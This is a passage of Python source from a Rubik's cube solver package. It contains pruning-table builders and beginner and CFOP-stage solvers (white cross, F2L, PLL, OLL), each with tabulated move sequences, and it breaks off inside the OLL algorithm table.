def build_slice_ur_to_df_parity_prun():
    """Breadth-first fill of the phase-2 pruning table over the combined
    (slice, URtoDF, parity) coordinate. Values are BFS depths packed two per
    byte (see CoordCube.setPruning); -1 entries mean 'not yet reached'.
    """
    slice_ur_to_df_parity_prun = [-1] * (CoordCube.N_SLICE2 * CoordCube.N_URtoDF * CoordCube.N_PARITY // 2)
    CoordCube.setPruning(slice_ur_to_df_parity_prun, 0, 0)  # solved state at depth 0
    done, depth = 1, 0
    # Expand one BFS frontier (all states at `depth`) per outer iteration.
    while done != (CoordCube.N_SLICE2 * CoordCube.N_URtoDF * CoordCube.N_PARITY):
        for i in range(CoordCube.N_SLICE2 * CoordCube.N_URtoDF * CoordCube.N_PARITY):
            # Unpack the flat index: lowest bit is parity, the rest splits
            # into the URtoDF and slice sub-coordinates.
            parity = i % 2
            URtoDF = (i // 2) // CoordCube.N_SLICE2
            slicing = (i // 2) % CoordCube.N_SLICE2
            if depth == CoordCube.getPruning(slice_ur_to_df_parity_prun, i):
                # Phase-2 move subset: U,U2,U',R2,F2,D,D2,D',L2,B2.
                for j in [0, 1, 2, 4, 7, 9, 10, 11, 13, 16]:
                    newSlice = CoordCube.FRtoBR_Move[slicing][j]
                    newURtoDF = CoordCube.URtoDF_Move[URtoDF][j]
                    newParity = CoordCube.parityMove[parity][j]
                    # 0x0f marks an untouched nibble (table initialised to -1).
                    if CoordCube.getPruning(slice_ur_to_df_parity_prun, (CoordCube.N_SLICE2 * newURtoDF + newSlice) * 2 + newParity) == 0x0f:
                        CoordCube.setPruning(slice_ur_to_df_parity_prun, (CoordCube.N_SLICE2 * newURtoDF + newSlice) * 2 + newParity, depth + 1)
                        done += 1
        depth += 1
    return slice_ur_to_df_parity_prun
def build_slice_twist_prun():
    """Breadth-first fill of the phase-1 pruning table over the combined
    (slice, twist) coordinate. Values are BFS depths packed two per byte
    (see CoordCube.setPruning); -1 entries mean 'not yet reached'.
    """
    slice_twist_prun = [-1] * (CoordCube.N_SLICE1 * CoordCube.N_TWIST // 2 + 1)
    CoordCube.setPruning(slice_twist_prun, 0, 0)  # solved state at depth 0
    done, depth = 1, 0
    while done < (CoordCube.N_SLICE1 * CoordCube.N_TWIST):
        for i in range(CoordCube.N_SLICE1 * CoordCube.N_TWIST):
            twist = i // CoordCube.N_SLICE1
            slicing = i % CoordCube.N_SLICE1
            if CoordCube.getPruning(slice_twist_prun, i) == depth:
                # Phase 1 uses all 18 face turns; the FRtoBR table is reused
                # for the coarse slice coordinate via the *24 / //24 mapping.
                for j in range(18):
                    newSlice = CoordCube.FRtoBR_Move[slicing * 24][j] // 24
                    newTwist = CoordCube.twistMove[twist][j]
                    # 0x0f marks an untouched nibble (table initialised to -1).
                    if CoordCube.getPruning(slice_twist_prun, CoordCube.N_SLICE1 * newTwist + newSlice) == 0x0f:
                        CoordCube.setPruning(slice_twist_prun, CoordCube.N_SLICE1 * newTwist + newSlice, depth + 1)
                        done += 1
        depth += 1
    return slice_twist_prun
def build_slice_flip_prun():
    """Breadth-first fill of the phase-1 pruning table over the combined
    (slice, flip) coordinate. Values are BFS depths packed two per byte
    (see CoordCube.setPruning); -1 entries mean 'not yet reached'.
    """
    slice_flip_prun = [-1] * (CoordCube.N_SLICE1 * CoordCube.N_FLIP // 2)
    CoordCube.setPruning(slice_flip_prun, 0, 0)  # solved state at depth 0
    done, depth = 1, 0
    while done < (CoordCube.N_SLICE1 * CoordCube.N_FLIP):
        for i in range(CoordCube.N_SLICE1 * CoordCube.N_FLIP):
            flip = i // CoordCube.N_SLICE1
            slicing = i % CoordCube.N_SLICE1
            if CoordCube.getPruning(slice_flip_prun, i) == depth:
                # Phase 1 uses all 18 face turns; the FRtoBR table is reused
                # for the coarse slice coordinate via the *24 / //24 mapping.
                for j in range(18):
                    newSlice = CoordCube.FRtoBR_Move[slicing * 24][j] // 24
                    newFlip = CoordCube.flipMove[flip][j]
                    # 0x0f marks an untouched nibble (table initialised to -1).
                    if CoordCube.getPruning(slice_flip_prun, CoordCube.N_SLICE1 * newFlip + newSlice) == 0x0f:
                        CoordCube.setPruning(slice_flip_prun, CoordCube.N_SLICE1 * newFlip + newSlice, depth + 1)
                        done += 1
        depth += 1
    return slice_flip_prun
## Attach the static move/pruning tables to CoordCube at import time.
## Each table is persisted as CSV next to this module, so the expensive
## build_* functions only run on a cache miss.
CoordCube.twistMove = read_or_func_matrix('twist_move.csv', build_twist_move)
CoordCube.flipMove = read_or_func_matrix('flip_move.csv', build_flip_move)
CoordCube.FRtoBR_Move = read_or_func_matrix('fr_to_br_move.csv', build_fr_to_br)
CoordCube.URFtoDLF_Move = read_or_func_matrix('urf_to_dlf_move.csv', build_urf_to_dlf)
CoordCube.URtoDF_Move = read_or_func_matrix('ur_to_df_move.csv', build_ur_to_df)
CoordCube.URtoUL_Move = read_or_func_matrix('ur_to_ul_move.csv', build_ur_to_ul)
CoordCube.UBtoDF_Move = read_or_func_matrix('ub_to_df_move.csv', build_ub_to_df)
CoordCube.MergeURtoULandUBtoDF = read_or_func_matrix('merge_ur_to_ul_and_ub_to_df_move.csv', build_merge_ur_to_ul_and_ub_to_df)
## The pruning tables are flat, nibble-packed lists rather than matrices.
CoordCube.Slice_URFtoDLF_Parity_Prun = read_or_func_list('slice_urf_to_dlf_parity_prun.csv', build_slice_urf_to_dlf_parity_prun)
CoordCube.Slice_URtoDF_Parity_Prun = read_or_func_list('slice_ur_to_df_parity_prun.csv', build_slice_ur_to_df_parity_prun)
CoordCube.Slice_Twist_Prun = read_or_func_list('slice_twist_prun.csv', build_slice_twist_prun)
CoordCube.Slice_Flip_Prun = read_or_func_list('slice_flip_prun.csv', build_slice_flip_prun)
from .. import Solver
from rubik_solver.Move import Move
class WhiteFaceSolver(Solver):
    '''
    This solves the down face with the white color
    '''
    # FIRST_STEP[corner_position][white_facing] -> moves that bring the white
    # corner from `corner_position` into the FRU position (top-front-right).
    # Positions already in the U layer only need a U-turn setup.
    FIRST_STEP = {
        'DFR': {
            'F': ["R", "U'", "R'"],
            'R': ["R", "U", "R'", "U'"]
        },
        'DFL': {
            'F': ["L'", "U", "L", "U'"],
            'L': ["L'", "U'", "L"],
            'D': ["L'", "U'", "L"]
        },
        'BDL': {
            'B': ["B'", "U2", "B"],
            'D': ["B'", "U2", "B"],
            'L': ["B'", "U", "B", "U2"]
        },
        'BDR': {
            'B': ["B", "U", "B'"],
            'D': ["B", "U", "B'"],
            'R': ["B", "U'", "B'", "U"]
        },
        'BRU': {
            'B': ["U"],
            'R': ["U"],
            'U': ["U"],
        },
        'BLU': {
            'B': ["U2"],
            'L': ["U2"],
            'U': ["U2"],
        },
        'FLU': {
            'F': ["U'"],
            'L': ["U'"],
            'U': ["U'"],
        }
    }
    # SECOND_STEP[white_facing] -> moves that insert the FRU corner down into
    # DFR with the white sticker facing down.
    SECOND_STEP = {
        'F': ["F'", "U'", "F"],
        'R': ["R", "U", "R'"],
        'U': ["R", "U2", "R'", "U'", "R", "U", "R'"]
    }
    @staticmethod
    def first_step(goal_cubie, white_facing):
        '''Moves that bring the white corner at `goal_cubie` up to FRU.

        Returns [] when no setup is needed (or the case is not tabulated,
        e.g. the corner already sits at DFR).'''
        try:
            solution = WhiteFaceSolver.FIRST_STEP[goal_cubie][white_facing]
        except KeyError:
            solution = []
        return solution
    @staticmethod
    def second_step(white_facing):
        '''Moves that insert the FRU corner into DFR, keyed by where the
        white sticker currently faces. Returns [] for untabulated cases.'''
        try:
            solution = WhiteFaceSolver.SECOND_STEP[white_facing]
        except KeyError:
            solution = []
        return solution
    def solution(self):
        '''Place the four white corners; returns the list of moves applied.'''
        solution = []
        # There are 4 down-corners
        for _ in range(4):
            # Identify the white corner that belongs between the current
            # F and R centers.
            front_color = self.cube.cubies['F'].facings['F']
            right_color = self.cube.cubies['R'].facings['R']
            goal_cubie = self.cube.search_by_colors('W', front_color, right_color)
            goal_cubie_obj = self.cube.cubies[goal_cubie]
            step_solution = WhiteFaceSolver.first_step(goal_cubie, goal_cubie_obj.color_facing('W'))
            for move in step_solution:
                self.cube.move(Move(move))
            # If corner is not already well placed and oriented, continue
            if len(step_solution) > 0 or goal_cubie != 'DFR':
                # Cubie is at FRU, place it at DRU with correct orientation
                solution.extend(step_solution)
                step_solution = WhiteFaceSolver.second_step(self.cube.cubies['FRU'].color_facing('W'))
                for move in step_solution:
                    self.cube.move(Move(move))
                solution.extend(step_solution)
            # Cubie is placed, move to next
            # Rotate the whole cube so the next F/R pair comes to the front.
            solution.append('Y')
            self.cube.move(Move('Y'))
        return solution
from .. import Solver
from rubik_solver.Move import Move
class SecondLayerSolver(Solver):
    """Places the four second-layer (equator) edges: FL, FR, BL and BR."""

    def is_solved(self):
        """True when all four equator edges match their adjacent centers."""
        centers = {face: self.cube.cubies[face].facings[face] for face in 'FBLR'}
        edge_checks = (
            ('FL', 'F', 'L'),
            ('FR', 'F', 'R'),
            ('BL', 'B', 'L'),
            ('BR', 'B', 'R'),
        )
        return all(
            self.cube.cubies[edge].facings[face_a] == centers[face_a]
            and self.cube.cubies[edge].facings[face_b] == centers[face_b]
            for edge, face_a, face_b in edge_checks
        )

    def move(self, move, solution):
        """Record `move` in `solution` and apply it to the cube."""
        solution.append(move)
        self.cube.move(Move(move))

    def solution(self):
        """Solve the second layer; returns the list of moves applied."""
        solution = []
        step = 0
        while not self.is_solved():
            if step > 6:
                # A full sweep of the cube found nothing placeable and the
                # layer is still unsolved: give up instead of looping forever.
                break
            current_cubie = self.cube.cubies['FU']
            step += 1
            if current_cubie.color_facing('Y') is None:
                # FU holds a second-layer edge: align it over its own face,
                # then insert it with F2R or F2L.
                step = 0
                target_face = self.cube.search_by_colors(current_cubie.facings['F'])
                setup_moves = {
                    'L': ("U", "Y'"),
                    'R': ("U'", "Y"),
                    'B': ("U2", "Y2"),
                }.get(target_face, ())
                for m in setup_moves:
                    self.move(m, solution)
                # Right now we are able to use the F2L or F2R algorithms
                if self.cube.cubies['FU'].facings['U'] == self.cube.cubies['R'].facings['R']:
                    # F2R: U R U' R' U' F' U F
                    for m in ("U", "R", "U'", "R'", "U'", "F'", "U", "F"):
                        self.move(m, solution)
                else:
                    # F2L: U' L' U L U F U' F'
                    for m in ("U'", "L'", "U", "L", "U", "F", "U'", "F'"):
                        self.move(m, solution)
            else:
                # FU shows yellow; if FR is badly placed/oriented (and free of
                # yellow) eject it with F2R so a later pass can fix it.
                front_color = self.cube.cubies['F'].facings['F']
                right_color = self.cube.cubies['R'].facings['R']
                fr_cubie = self.cube.cubies['FR']
                needs_eject = (
                    (fr_cubie.facings['F'] != front_color
                     or fr_cubie.facings['R'] != right_color)
                    and fr_cubie.color_facing('Y') is None
                )
                if needs_eject:
                    # Apply F2R
                    for m in ("U", "R", "U'", "R'", "U'", "F'", "U", "F"):
                        self.move(m, solution)
                self.move("Y", solution)
        return solution
from .. import Solver
from rubik_solver.Move import Move
class WhiteCrossSolver(Solver):
    '''
    This class solves the white cross on the down face
    '''
    # STEPS[white_facing][color_facing] -> moves that bring a white edge to
    # the U layer with its white sticker facing up, ready for alignment.
    STEPS = {
        'U': {
            'R': [],
            'L': [],
            'F': [],
            'B': [],
        },
        'D': {
            'R': ['R2'],
            'L': ['L2'],
            'F': ['F2'],
            'B': ['B2']
        },
        'F': {
            'U': ["F", "R", "U'", "R'", "F'"],
            'D': ["F'", "R", "U'", "R'"],
            'R': ["R", "U", "R'"],
            'L': ["L'", "U'", "L"],
        },
        'B': {
            'U': ["B", "L", "U'", "L'", "B'"],
            'D': ["B", "R'", "U", "R"],
            'R': ["R'", "U", "R"],
            'L': ["L", "U'", "L'"],
        },
        'L': {
            'U': ["L", "F", "U'", "F'", "L'"],
            'D': ["L'", "F", "U'", "F'"],
            'F': ["F", "U'", "F'"],
            'B': ["B'", "U", "B"],
        },
        'R': {
            'U': ["R'", "F'", "U", "F", "R"],
            'D': ["R", "F'", "U", "F"],
            'F': ["F'", "U", "F"],
            'B': ["B", "U'", "B'"],
        }
    }
    @staticmethod
    def first_step(white_facing, color_facing):
        '''Moves that lift the white edge (white sticker on `white_facing`,
        side color on `color_facing`) to the top with white facing up.'''
        return WhiteCrossSolver.STEPS[white_facing.upper()][color_facing.upper()]
    def solution(self):
        '''Build the white cross; returns the list of moves applied.'''
        solution = []
        # One pass per side color, in the fixed R/G/O/B order.
        for color in 'RGOB':
            cubie_position = self.cube.search_by_colors('W', color)
            orig_cubie = self.cube.cubies[cubie_position]
            white_facing = orig_cubie.color_facing('W')
            color_facing = orig_cubie.color_facing(color)
            step_solution = WhiteCrossSolver.first_step(white_facing, color_facing)
            # First goal is to put white sticker on top face
            for m in step_solution:
                self.cube.move(Move(m))
            solution.extend(step_solution)
            # Second goal is to place the cubie on the top over its place
            while self.cube.cubies['FU'].facings['U'] != 'W' or self.cube.cubies['FU'].facings['F'] != color:
                solution.append('U')
                self.cube.move(Move('U'))
            # Third goal will be a F2 movement
            solution.append("F2")
            self.cube.move(Move("F2"))
            # Rotate the whole cube so the next side color faces front.
            solution.append('Y')
            self.cube.move(Move("Y"))
        return solution
from .. import Solver
from rubik_solver.Move import Move
class YellowFaceSolver(Solver):
    """Solves the yellow (last) layer: edge permutation, corner placement,
    corner orientation, then the final U-layer alignment."""

    def apply_edges_algorithm(self, solution):
        """Cycle three top-layer edges (R U R' U R U2 R')."""
        for step in ("R", "U", "R'", "U", "R", "U2", "R'"):
            self.move(step, solution)

    def apply_corner_place_algorithm(self, solution):
        """Cycle three top-layer corners while FRU stays in place."""
        for step in ("U", "R", "U'", "L'", "U", "R'", "U'", "L"):
            self.move(step, solution)

    def apply_corner_orient_algorithm(self, solution):
        """Twist the FRU corner in place (repeatable R' D' R D)."""
        for step in ("R'", "D'", "R", "D"):
            self.move(step, solution)

    def edges_are_placed(self):
        """True when the four top edges form the correct G-O-B-R cycle."""
        ring = [
            str(self.cube.cubies[position].facings[face])
            for position, face in (('FU', 'F'), ('RU', 'R'), ('BU', 'B'), ('LU', 'L'))
        ]
        # Rotate the observed ring so it starts at green, then compare.
        start = ring.index('G')
        rotated = ring[start:] + ring[:start]
        return ''.join(rotated) == 'GOBR'

    def corner_is_placed(self, corner):
        """True when the corner's neighbouring top edges carry its colors."""
        cubie = self.cube.cubies[corner]
        side_faces = ''.join(cubie.faces).replace('U', '')
        return all(
            self.cube.cubies[face + 'U'].facings[face] in cubie.colors
            for face in side_faces
        )

    def placed_corners(self):
        """Subset of (FRU, FLU, BRU, BLU) that are correctly placed, in order."""
        return [c for c in ('FRU', 'FLU', 'BRU', 'BLU') if self.corner_is_placed(c)]

    def move(self, m, solution):
        """Apply move `m` to the cube and record it in `solution`."""
        self.cube.move(Move(m))
        solution.append(m)

    def solution(self):
        """Run the full last-layer procedure; returns the move list."""
        solution = []
        # Step 1: permute the top edges.
        turns = 0
        while not self.edges_are_placed():
            turns += 1
            if turns >= 4:
                # A full rotation found nothing: apply the edge algorithm
                # twice to break out of the cycle.
                turns = 0
                self.apply_edges_algorithm(solution)
                self.apply_edges_algorithm(solution)
            self.move("Y'", solution)
        # Step 2: place the corners.
        while True:
            placed = self.placed_corners()
            if len(placed) == 4:
                break
            if len(placed) == 1:
                # Bring the single placed corner to FRU, then cycle the rest.
                while self.placed_corners()[0] != 'FRU':
                    self.move("U", solution)
                self.apply_corner_place_algorithm(solution)
            else:
                # No placed corner yet: one cycle will place at least one.
                self.apply_corner_place_algorithm(solution)
        # Step 3: orient each corner while it sits at FRU.
        for _ in range(4):
            corner = self.cube.cubies['FRU']
            while corner.facings['U'] != 'Y':
                self.apply_corner_orient_algorithm(solution)
            self.move("U", solution)
        # Step 4: align the whole top layer with the centers.
        while self.cube.cubies['F'].facings['F'] != self.cube.cubies['FU'].facings['F']:
            self.move("U", solution)
        return solution
from rubik_solver.Move import Move
from .. import Solver
class PLLSolver(Solver):
    '''Permutation-of-the-Last-Layer solver (final CFOP stage).

    STEPS maps a 9-digit orientation signature (see get_orientations) to the
    PLL algorithm that solves that permutation.'''
    STEPS = {
        "810345672": ["X", "R'", "U", "R'", "D2", "R", "U'", "R'", "D2", "R2", "X'"],
        "018345276": ["X'", "R", "U'", "R", "D2", "R'", "U", "R", "D2", "R2", "X"],
        "012743658": ["R2", "U", "R", "U", "R'", "U'", "R'", "U'", "R'", "U", "R'"],
        "012547638": ["R", "U'", "R", "U", "R", "U", "R", "U'", "R'", "U'", "R2"],
        "072543618": ["M2", "U", "M2", "U2", "M2", "U", "M2"],
        "018543672": ["R", "U", "R'", "U'", "R'", "F", "R2", "U'", "R'", "U'", "R", "U", "R'", "F'"],
        "230145678": ["R'", "U", "L'", "U2", "R", "U'", "R'", "U2", "R", "L", "U'"],
        "018347652": ["R", "U", "R'", "F'", "R", "U", "R'", "U'", "R'", "F", "R2", "U'", "R'", "U'"],
        "210745638": ["L", "U2", "L'", "U2", "L", "F'", "L'", "U'", "L", "U", "L", "F", "L2", "U"],
        "210347658": ["R'", "U2", "R", "U2", "R'", "F", "R", "U", "R'", "U'", "R'", "F'", "R2", "U'"],
        "852341670": ["R'", "U", "R'", "Y", "U'", "R'", "F'", "R2", "U'", "R'", "U", "R'", "F", "R", "F"],
        "650143278": ["R2", "Y", "D", "R'", "U", "R'", "U'", "R", "Y'", "D'", "R2", "Y'", "R'", "U", "R"],
        "832745016": ["R'", "U'", "R", "Y", "R2", "Y", "D", "R'", "U", "R", "U'", "R", "Y'", "D'", "R2"],
        "812743056": ["R2", "Y'", "D'", "R", "U'", "R", "U", "R'", "Y", "D", "R2", "Y", "R", "U'", "R'"],
        "670145238": ["R", "U", "R'", "Y'", "R2", "Y'", "D'", "R", "U'", "R'", "U", "R'", "Y", "D", "R2"],
        "012543876": ["R'", "U2", "R'", "Y", "U'", "R'", "F'", "R2", "U'", "R'", "U", "R'", "F", "R", "U'", "F"],
        "032147658": ["M2", "U", "M2", "U", "M'", "U2", "M2", "U2", "M'", "U2"],
        "832145670": ["F", "R", "U'", "R'", "U'", "R", "U", "R'", "F'", "R", "U", "R'", "U'", "R'", "F", "R", "F'"],
        "872345610": ["L", "U'", "R", "U2", "L'", "U", "R'", "L", "U'", "R", "U2", "L'", "U", "R'", "U"],
        "076345218": ["R'", "U", "L'", "U2", "R", "U'", "L", "R'", "U", "L'", "U2", "R", "U'", "L", "U'"],
        "618345072": ["X'", "R", "U'", "R'", "D", "R", "U", "R'", "D'", "R", "U", "R'", "D", "R", "U'", "R'", "D'", "X"]
    }
    @staticmethod
    def get_orientations(cube):
        '''Return the 9-digit permutation signature of the top layer.

        For each top position (BLU..FRU plus the U center) the digit is the
        index of the position where the cubie that belongs there currently
        sits.'''
        cubies = ['BLU', 'BU', 'BRU', 'LU', 'U', 'RU', 'FLU', 'FU', 'FRU']
        orientation = []
        for cubie in cubies:
            o = PLLSolver.get_correct_cubie(cube, cubie)
            orientation.append(str(cubies.index(o)))
        return ''.join(orientation)
    def move(self, s, solution):
        '''Apply move `s` to the cube and record it in `solution`.'''
        self.cube.move(Move(s))
        solution.append(s)
    @staticmethod
    def get_correct_cubie(cube, cubie):
        '''Find the current position of the cubie that belongs at `cubie`
        (identified by yellow plus the side-center colors of the position).'''
        colors = [cube.cubies[c].facings[c].color for c in cubie.replace('U', '')]
        return cube.search_by_colors('Y', *colors)
    def solution(self):
        '''Permute the last layer; returns the list of moves applied.

        NOTE(review): each outer iteration applies U four times and then Y
        four times (a net identity) before checking the signature once --
        this looks like it was meant to test the 4x4 U/Y offsets; confirm
        intent before changing.'''
        solution = []
        while True:
            for _ in range(4):
                self.move('U', solution)
            for _ in range(4):
                self.move('Y', solution)
            orientation = PLLSolver.get_orientations(self.cube)
            if orientation in PLLSolver.STEPS:
                for s in PLLSolver.STEPS[orientation]:
                    self.move(s, solution)
                return solution
            # Apply shortest and expect to be solvable after that
            for s in PLLSolver.STEPS["072543618"]:
                self.move(s, solution)
        # NOTE(review): unreachable -- the while True above always returns.
        return []
from rubik_solver.Move import Move
from .. import Solver
from ..Beginner.WhiteFaceSolver import WhiteFaceSolver
class F2LSolver(Solver):
    '''First-Two-Layers solver (CFOP). Pairs each white corner with its
    matching edge and inserts both into the FR slot, rotating the cube (Y)
    between the four slots.'''
    # STEPS[corner_facings][edge_facings] -> insertion algorithm; see
    # get_step for how the keys encode the cubie orientations.
    STEPS = {
        'FUR': {
            'UB': ["R", "U", "R'"],
            'FU': ["U'", "F'", "U", "F"],
            'FR': ["U", "F'", "U", "F", "U", "F'", "U2", "F"],
            'RF': ["U", "F'", "U'", "F", "Y", "U'", "F", "U", "F'", "Y'"],
            'RU': ["R", "U'", "R'", "U", "Y'", "U", "R'", "U'", "R", "Y"],
            'BU': ["U", "F'", "U2", "F", "U", "F'", "U2", "F"],
            'LU': ["U", "F'", "U'", "F", "U", "F'", "U2", "F"],
            'UR': ["U'", "R", "U'", "R'", "U", "R", "U", "R'"],
            'UL': ["U'", "R", "U", "R'", "U", "R", "U", "R'"],
            'UF': ["U", "F'", "U2", "F", "U'", "R", "U", "R'"],
        },
        'URF': {
            'LU': ["F'", "U'", "F"],
            'UR': ["U", "R", "U'", "R'"],
            'FR': ["U'", "R", "U'", "R'", "U'", "R", "U2", "R'"],
            'RF': ["U'", "R", "U", "R'", "Y'", "U", "R'", "U'", "R", "Y"],
            'UF': ["F'", "U", "F", "U'", "Y", "U'", "F", "U", "F'", "Y'"],
            'UL': ["U'", "R", "U2", "R'", "U'", "R", "U2", "R'"],
            'UB': ["U'", "R", "U", "R'", "U'", "R", "U2", "R'"],
            'FU': ["U", "F'", "U", "F", "U'", "F'", "U'", "F"],
            'BU': ["U", "F'", "U'", "F", "U'", "F'", "U'", "F"],
            'RU': ["U'", "R", "U2", "R'", "U", "F'", "U'", "F"],
        },
        'FRD': {
            'FU': ["U", "R", "U'", "R'", "U'", "F'", "U", "F"],
            'RU': ["U2", "R", "U'", "R'", "U'", "F'", "U", "F"],
            'LU': ["R", "U'", "R'", "U'", "F'", "U", "F"],
            'BU': ["U'", "R", "U'", "R'", "U'", "F'", "U", "F"],
            'UR': ["U'", "F'", "U", "F", "U", "R", "U'", "R'"],
            'UL': ["U", "F'", "U", "F", "U", "R", "U'", "R'"],
            'UB': ["F'", "U", "F", "U", "R", "U'", "R'"],
            'UF': ["U2", "F'", "U", "F", "U", "R", "U'", "R'"],
            'RF': ["R", "U'", "R'", "Y'", "U", "R'", "U2", "R", "U", "R'", "U2", "R", "Y"],
            'FR': [],
        },
        'DFR': {
            'FU': ["F'", "U", "F", "U'", "F'", "U", "F"],
            'UR': ["R", "U", "R'", "U'", "R", "U", "R'"],
            'FR': ["R", "U'", "R'", "U", "R", "U2", "R'", "U", "R", "U'", "R'"],
            'RF': ["R", "U", "R'", "U'", "R", "U'", "R'", "U", "Y'", "U", "R'", "U'", "R", "Y"],
        },
        'RDF': {
            'FU': ["F'", "U'", "F", "U", "F'", "U'", "F"],
            'UR': ["R", "U'", "R'", "U", "R", "U'", "R'"],
            'FR': ["R", "U'", "R'", "U'", "R", "U", "R'", "U'", "R", "U2", "R'"],
            'RF': ["R", "U'", "R'", "Y'", "U", "R'", "U'", "R", "U'", "R'", "U'", "R", "Y"]
        },
        'RFU':{
            'FR': ["R", "U", "R'", "U'", "R", "U", "R'", "U'", "R", "U", "R'"],
            'RF': ["R", "U'", "R'", "Y'", "U", "R'", "U", "R", "Y"],
            'UF': ["R", "U", "R'", "U'", "U'", "R", "U", "R'", "U'", "R", "U", "R'"],
            'UL': ["U2", "R", "U", "R'", "U", "R", "U'", "R'"],
            'UB': ["U", "R", "U2", "R'", "U", "R", "U'", "R'"],
            'UR': ["R", "U2", "R'", "U'", "R", "U", "R'"],
            'LU': ["U'", "F'", "U2", "F", "U'", "F'", "U", "F"],
            'BU': ["U2", "F'", "U'", "F", "U'", "F'", "U", "F"],
            'RU': ["Y'", "R'", "U'", "R", "U2", "R'", "U'", "R", "U", "R'", "U'", "R", "Y"],
            'FU': ["F'", "U2", "F", "U", "F'", "U'", "F"],
        },
    }
    @staticmethod
    def get_step(corner, edge):
        '''
        This method returns the step to place to 2 cubies in place,
        the variables encodes the cubies position and orientation.
        corner must be a string with 3 letters, each letter represents
        the facing of the colors in the following way:
            1st letter: where the front color (cubie F) is facing in the corner to move
            2nd letter: where the right color (cubie R) is facing in the corner to move
            3rd letter: where the bottom color (cubie B, usually white) is facing in the corner to move
        The same applies with the edge variable
        '''
        return F2LSolver.STEPS[corner][edge]
    def move(self, s, solution):
        '''Apply move `s` to the cube and record it in `solution`.'''
        self.cube.move(Move(s))
        solution.append(s)
    def solution(self):
        '''Solve all four F2L slots; returns the list of moves applied.'''
        solution = []
        for _ in range(4):
            front_color = self.cube.cubies['F'].facings['F'].color
            right_color = self.cube.cubies['R'].facings['R'].color
            corner = self.cube.search_by_colors(front_color, right_color, 'W')
            # Reuse the beginner white-corner setup to bring the corner to
            # the U layer (or leave it if already inserted at DFR).
            step_solution = WhiteFaceSolver.first_step(corner, self.cube.cubies[corner].color_facing('W'))
            solution.extend(step_solution)
            for s in step_solution:
                self.cube.move(Move(s))
            edge = self.cube.search_by_colors(front_color, right_color)
            # If edge is in BL or BR, WAF!, this case is not expected in any manual
            # Eject the edge to the U layer first.
            if edge == 'BL':
                self.move("B'", solution)
                self.move("U'", solution)
                self.move("B", solution)
            elif edge == 'BR':
                self.move("B", solution)
                self.move("U", solution)
                self.move("B'", solution)
            elif edge == 'FL':
                self.move("L'", solution)
                self.move("U'", solution)
                self.move("L", solution)
            corner = self.cube.search_by_colors(front_color, right_color, 'W')
            #Place corner in FRU if needed
            if 'U' in corner:
                while corner != 'FRU':
                    self.move("U", solution)
                    corner = self.cube.search_by_colors(front_color, right_color, 'W')
            edge = self.cube.search_by_colors(front_color, right_color)
            # Encode both cubies' orientations as STEPS keys (see get_step).
            corner_facings = ''.join([
                self.cube.cubies[corner].color_facing(front_color),
                self.cube.cubies[corner].color_facing(right_color),
                self.cube.cubies[corner].color_facing('W')
            ])
            edge_facings = ''.join([
                self.cube.cubies[edge].color_facing(front_color),
                self.cube.cubies[edge].color_facing(right_color)
            ])
            step_solution = F2LSolver.get_step(corner_facings, edge_facings)
            solution.extend(step_solution)
            for s in step_solution:
                self.cube.move(Move(s))
            # Rotate the whole cube so the next slot comes to FR.
            self.cube.move(Move("Y"))
            solution.append("Y")
        return solution
from rubik_solver.Move import Move
from .. import Solver
class OLLSolver(Solver):
    """Solver for the OLL (Orientation of the Last Layer) step of CFOP.

    Looks up the orientation pattern of the yellow face in STEPS and applies
    the corresponding algorithm.
    """

    # Keys are the 9 top-layer sticker facings read left-to-right, back-to-front
    # (see get_orientations); values are the move sequences that orient them.
    STEPS = {
        "LBRLURLFR": ["R", "U", "B'", "X'", "R", "U", "X2", "R2", "X'", "U'", "R'", "F", "R", "F'"],
        "LBRLURFFF": ["R'", "F", "R", "F'", "U2", "R'", "F", "R", "Y'", "R2", "U2", "R"],
        "BBRLURLFU": ["Y", "M", "U", "X", "R'", "U2", "X'", "R", "U", "L'", "U", "L", "M'"],
        "LBULURFFR": ["R'", "U2", "X", "R'", "U", "R", "U'", "Y", "R'", "U'", "R'", "U", "R'", "F", "Z'"],
        "UBBLURLFU": ["R", "U", "R'", "U", "R'", "F", "R", "F'", "U2", "R'", "F", "R", "F'"],
        "UBULURUFU": ["M'", "U2", "M", "U2", "M'", "U", "M", "U2", "M'", "U2", "M"],
        "UBULURLFR": ["R'", "U2", "F", "R", "U", "R'", "U'", "Y'", "R2", "U2", "X'", "R", "U", "X"],
        "BBBLURUFU": ["F", "R", "U", "R'", "U", "Y'", "R'", "U2", "R'", "F", "R", "F'"],
        "BURLURFUR": ["R'", "U'", "Y", "L'", "U", "L'", "Y'", "L", "F", "L'", "F", "R"],
        "LURLURLUR": ["R", "U'", "Y", "R2", "D", "R'", "U2", "R", "D'", "R2", "Y'", "U", "R'"],
        "BBRUUUFFR": ["F", "U", "R", "U'", "R'", "U", "R", "U'", "R'", "F'"],
        "LBRUUULFR": ["L'", "B'", "L", "U'", "R'", "U", "R", "U'", "R'", "U", "R", "L'", "B", "L"],
        "BURUUUFUR": ["L", "U'", "R'", "U", "L'", "U", "R", "U", "R'", "U", "R"],
        "LURUUULUR": ["R", "U", "R'", "U", "R", "U'", "R'", "U", "R", "U2", "R'"],
        "LUBUUUFUU": ["L'", "U", "R", "U'", "L", "U", "R'"],
        "BURUUULUU": ["R'", "U2", "R", "U", "R'", "U", "R"],
        "UUBUUUUUF": ["R'", "F'", "L", "F", "R", "F'", "L'", "F"],
        "UUUUUUFUF": ["R2", "D", "R'", "U2", "R", "D'", "R'", "U2", "R'"],
        "UUBUUULUU": ["R'", "F'", "L'", "F", "R", "F'", "L", "F"],
        "UBUUURUUU": ["M'", "U'", "M", "U2", "M'", "U'", "M"],
        "UBUUUUUFU": ["L'", "R", "U", "R'", "U'", "L", "R'", "F", "R", "F'"],
        "BURUURUFF": ["L", "F", "R'", "F", "R", "F2", "L'"],
        "UURUURFFU": ["F", "R'", "F'", "R", "U", "R", "U'", "R'"],
        "LUBUURFFU": ["R'", "U'", "R", "Y'", "X'", "R", "U'", "R'", "F", "R", "U", "R'", "X"],
        "BUBUURUFU": ["U'", "R", "U2", "R'", "U'", "R", "U'", "R2", "Y'", "R'", "U'", "R", "U", "B"],
        "LUBUURLFF": ["F", "R", "U", "R'", "U'", "R", "U", "R'", "U'", "F'"],
        "BUBUURFFF": ["L", "F'", "L'", "F", "U2", "L2", "Y'", "L", "F", "L'", "F"],
        "BUBLUUUFU": ["U'", "R'", "U2", "R", "U", "R'", "U", "R2", "Y", "R", "U", "R'", "U'", "F'"],
        "LUULUUFFR": ["X", "L", "U2", "R'", "U'", "R", "U'", "X'", "L'"],
